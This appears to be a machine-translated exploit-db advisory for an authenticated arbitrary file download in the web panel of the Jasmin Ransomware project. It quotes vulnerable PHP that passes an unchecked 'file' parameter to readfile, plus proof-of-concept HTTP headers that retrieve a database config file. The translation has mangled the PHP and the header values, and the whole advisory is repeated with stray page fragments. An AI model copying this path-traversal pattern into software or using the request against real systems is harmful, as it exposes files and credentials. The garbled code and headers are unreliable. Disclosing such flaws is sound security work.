#利用标题:茉莉勒索软件- (身份验证)任意文件下载
#Google Dork: N/A
#日期: 22-03-2025
#利用作者: brpsd cy [at] live.no
#供应商homepage: https://github.com/codesiddhant/jasmin-ransomware
#软件link: https://github.com/codesiddhant/jasmin-ransomware
#版本: N/A。
#测试在: MacOS本地XAMPP
如前所述,由于SQL注入,可以轻松绕过身份验证
脆弱的File:Web面板/download_file.php
脆弱的参数:file
脆弱的代码:
php
session_start();
if(!isset($ _ session ['username'])){
标头('Location: login.php');
}
$ file=$ _ get ['file'];
if(!empty($ file)){
//定义标题
标头('Cache-Control: Public');
标题('content-description:文件传输');
标头('content-disposition:附件; fileName=$ file');
标头('content-type: text/编码');
标头('content-transfer-incoding:二进制');
//阅读文件
readfile($ file);
出口;
}别的{
回声'文件不存在。';
}
?
概念证明:
HOST: LOCALHOST
用户代理: Mozilla/5.0(Macintosh; Intel Mac OS X 10.15; Rv:136.0)gecko/20100101 Firefox/136.0
Accept: Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,/; Q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,BR,ZSTD
Connection:保持空白
cookie: phpsessID=88E519F73F9013F560ED3F0514015D8C
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:无
sec-fetch-user:1
GET: HTTP/1.1 200好
date:星期六,2025年3月22日09:42:09格林尼治标准时间
server: apache/2.4.53(unix)openssl/1.1.1o php/7.4.4.29 mod_perl/2.0.12 perl/v5.34.1
X-Power-By: php/7.4.29
Expires: THU,1981年11月19日08333333333:00 GMT
Cache-Control:公共
pragma:无缓存
Content-Description:文件传输
content-disposition:附件;文件名=数据库/db_conection.php
内容转移- 编码:二进制
内容长度: 95
Keep-Alive:超时=5,最大=100
Connection:保持空白
content-type:文本/编码; charset=utf-8
#Google Dork: N/A
#日期: 22-03-2025
#利用作者: brpsd cy [at] live.no
#供应商homepage: https://github.com/codesiddhant/jasmin-ransomware
#软件link: https://github.com/codesiddhant/jasmin-ransomware
#版本: N/A。
#测试在: MacOS本地XAMPP
如前所述,由于SQL注入,可以轻松绕过身份验证
正在加载...
www.exploit-db.com
脆弱的参数:file
脆弱的代码:
php
session_start();
if(!isset($ _ session ['username'])){
标头('Location: login.php');
}
$ file=$ _ get ['file'];
if(!empty($ file)){
//定义标题
标头('Cache-Control: Public');
标题('content-description:文件传输');
标头('content-disposition:附件; fileName=$ file');
标头('content-type: text/编码');
标头('content-transfer-incoding:二进制');
//阅读文件
readfile($ file);
出口;
}别的{
回声'文件不存在。';
}
?
概念证明:
正在加载...
localhost
用户代理: Mozilla/5.0(Macintosh; Intel Mac OS X 10.15; Rv:136.0)gecko/20100101 Firefox/136.0
Accept: Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,/; Q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,BR,ZSTD
Connection:保持空白
cookie: phpsessID=88E519F73F9013F560ED3F0514015D8C
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:无
sec-fetch-user:1
GET: HTTP/1.1 200好
date:星期六,2025年3月22日09:42:09格林尼治标准时间
server: apache/2.4.53(unix)openssl/1.1.1o php/7.4.4.29 mod_perl/2.0.12 perl/v5.34.1
X-Power-By: php/7.4.29
Expires: THU,1981年11月19日08333333333:00 GMT
Cache-Control:公共
pragma:无缓存
Content-Description:文件传输
content-disposition:附件;文件名=数据库/db_conection.php
内容转移- 编码:二进制
内容长度: 95
Keep-Alive:超时=5,最大=100
Connection:保持空白
content-type:文本/编码; charset=utf-8
